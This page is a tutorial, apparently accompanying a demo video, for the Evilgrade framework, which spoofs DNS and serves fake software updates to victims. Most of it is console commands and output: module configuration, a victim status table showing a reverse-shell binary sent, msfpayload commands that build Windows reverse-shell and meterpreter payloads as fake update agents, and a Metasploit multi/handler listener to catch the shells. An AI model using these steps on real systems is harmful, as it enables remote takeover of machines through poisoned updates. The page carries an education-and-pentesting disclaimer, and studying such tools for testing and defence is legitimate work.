Hacking with Evilgrade
[Youtube Data] Public Data - [Evilgrade]
제목 : Hacking with Evilgrade
주의 : 테스트 이외의 목적으로 발생 되는 문제점에 대해서는 프로그램을 사용하는 사용자가 책임을 지셔야 한다는 것을 알려 드립니다.
Disclaimer: I am not responsible for any damage done using this tool. This tool should only be used for educational purposes and for penetration testing.
내용 :
Evilgrade 툴 에 대한 시현 영상입니다. DNS 트래픽 조작 툴 입니다.
Description :
Evilgrade is a modular framework that allows the user to take advantage of poor upgrade implementations by injecting fake updates. It comes with pre-made binaries (agents), a working default configuration for fast pentests, and has it's own WebServer and DNSServer modules. Easy to set up new settings, and has an autoconfiguration when new binary agents are set.
Infomation :
Commandsconfigure / conf - Configure
Example #1
evilgrade>configure sunjava evilgrade(sunjava)> evilgrade>conf sunjava evilgrade(sunjava)> ## 'conf' takes us back to the global configuration evilgrade(sunjava)>conf evilgrade> ## reload - Reload to get all modules update (to refresh loaded modules, useful on development) start - Start webserver stop - Stop webserver (fake update server)
Example #2
evilgrade>start evilgrade> [28/10/2010:21:35:55] - [WEBSERVER] - Webserver ready. Waiting for connections ... evilgrade> [28/10/2010:21:35:55] - [DNSSERVER] - DNS Server Ready. Waiting for Connections ... ####################################### Example: ------- evilgrade>stop Stopping WEBSERVER [OK] Stopping DNSSERVER [OK] ####################################### restart - Restart services (WebServer and DNS Server) stops and starts again ####################################### status - Get webserver and victims status Example: ------- evilgrade>show status Webserver (pid 4134) already running Users status: ============ .---------------------------------------------------------------------------------------------------------------. | Client | Module | Status | Md5,Cmd,File | +----------------+------------------+--------+------------------------------------------------------------------+ | 192.168.233.10 | modules::sunjava | send | d9a28baa883ecf51e41fc626e1d4eed5,'',"./agent/reverseshell.exe" | '----------------+------------------+--------+------------------------------------------------------------------' ####################################### show - Display information of <object>. ####################################### show active - Display active modules in the webserver ####################################### show modules - Display implemented modules ######################################### show options - Display modules/global options Example: ------- evilgrade>show options Display options: =============== .-----------------------------------------------------------------------------------. | Name | Default | Description | +-------------+-----------+---------------------------------------------------------+ | DNSEnable | 1 | Enable DNS Server ( handle virtual request on modules ) | | DNSAnswerIp | 127.0.0.1 | Resolve VHost to ip ) | | DNSPort | 53 | Listen Name Server port | | debug | 1 | Debug mode | | port | 80 | Webserver listening port | | sslport | 443 | Webserver SSL listening port | '-------------+-----------+---------------------------------------------------------' evilgrade> evilgrade(notepadplus)>conf vmware evilgrade(vmware)>show options (without started services) Display options: =============== Name = VMware Server Version = 1.0 Author = ["Francisco Amato < famato +[AT]+ faradaysec.com>"] Description = "" VirtualHost = "www.vmware.com" .----------------------------------------------. | Name | Default | Description | +--------+-------------------+-----------------+ | enable | 1 | Status | | agent | ./agent/agent.exe | Agent to inject | '--------+-------------------+-----------------' evilgrade(vmware)>show options (with started services after setting agent) Display options: =============== Name = VMware Server Version = 1.0 Author = ["Francisco Amato < famato +[AT]+ faradaysec.com>"] Description = "" VirtualHost = "www.vmware.com" .--------------------------------------------------------------------------------------------------. | Name | Default | Description | +-------------+------------------------------------------------------------------+-----------------+ | enable | 1 | Status | | agentmd5 | f80af637642170507bda998b6f2015fa | | | agentsize | 54576 | | | agent | ./agent/agent.exe | Agent to inject | | agentsha256 | 44f4e3f65f6ca375df4e0247fa0ee1efedbe2965a1c35e910d8d035ec61b76bd | | '-------------+------------------------------------------------------------------+-----------------' ######################################### set - Configure variables global or modules Example: ------- evilgrade>show options Display options: =============== .-----------------------------------------------------------------------------------. | Name | Default | Description | +-------------+-----------+---------------------------------------------------------+ | DNSEnable | 1 | Enable DNS Server ( handle virtual request on modules ) | | DNSAnswerIp | 127.0.0.1 | Resolve VHost to ip ) | | DNSPort | 53 | Listen Name Server port | | debug | 0 | Debug mode | | port | 80 | Webserver listening port | | sslport | 443 | Webserver SSL listening port | '-------------+-----------+---------------------------------------------------------' ###Let's enable DEBUG option and set as DNSAnswerIp our Inet address (192.168.1.4) evilgrade>set debug 1 #Enable debug set debug, 1 evilgrade>set DNSAnswerIp 192.168.1.4 #Ip where evilgrade's DNS Server is listening set DNSAnswerIp, 192.168.1.4 evilgrade>show options Display options: =============== .-------------------------------------------------------------------------------------. | Name | Default | Description | +-------------+-------------+---------------------------------------------------------+ | DNSEnable | 1 | Enable DNS Server ( handle virtual request on modules ) | | DNSAnswerIp | 192.168.1.4 | Resolve VHost to ip ) | | DNSPort | 53 | Listen Name Server port | | debug | 1 | Debug mode | | port | 80 | Webserver listening port | | sslport | 443 | Webserver SSL listening port | '-------------+-------------+---------------------------------------------------------' ############################### exit - exits the program ####################################### help - prints this screen, or help on 'command' #######################################
Advance
Modules Options: Each module has special options, but the "agent" field is always present. The agent is our fake update binary, we have to set the path to where it's located or implement a dynamic fake update binary generation.
Example #1-1
evilgrade(sunjava)>set agent '["/metasploit/msfpayload windows/shell_reverse_tcp LHOST=192.168.233.2 LPORT=4141 X > <%OUT%>/tmp/a.exe<%OUT%>"]'
In this case for every required update binary we generate a fake update binary with the payload "windows/shell_reverse_tcp" using a reverse shell to connect at address 192.168.233.2 port 4141. The label <%OUT%><%OUT> is a special tag to detect where the output binary is going to be generated. Evilgrade detects the usage of "dynamic fake update binary feature" due to having a sentence between squared brackets '[]' Inside that brackets we have a string that is also between brackets "" that is compiled using perl.
For example if we use:
evilgrade(sunjava)>set agent '["./generatebin -o <%OUT%>/tmp/update".int(rand(256)).".exe<%OUT%>"]'
then every time we get a binary request, evilgrade will compile the line and execute the final string "./generatebin -o /tmp/update(random).exe" generating different agents.
An easy alternative, but not dynamically, could be to generate the payload directly from msfpayload on a terminal and assign it manually to the configuration of the module.
Example #1-2
(Outside evilgrade)
[team@faraday]$ msfpayload windows/meterpreter/reverse_ord_tcp LHOST=192.168.100.2 LPORT=4444 X > /tmp/reverse-shell.exe
(Inside evilgrade)
evilgrade(sunjava)>set agent /tmp/reverse-shell.exe
After our payload was generated, we leave a multi handler listening on the previously assigned LHOST.
(Outside evilgrade)
[team@faraday]$ msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.100.2 LPORT=4444 E [*] Started reverse handler on 192.168.100.2:4444 [*] Starting the payload handler...
Last updated
Was this helpful?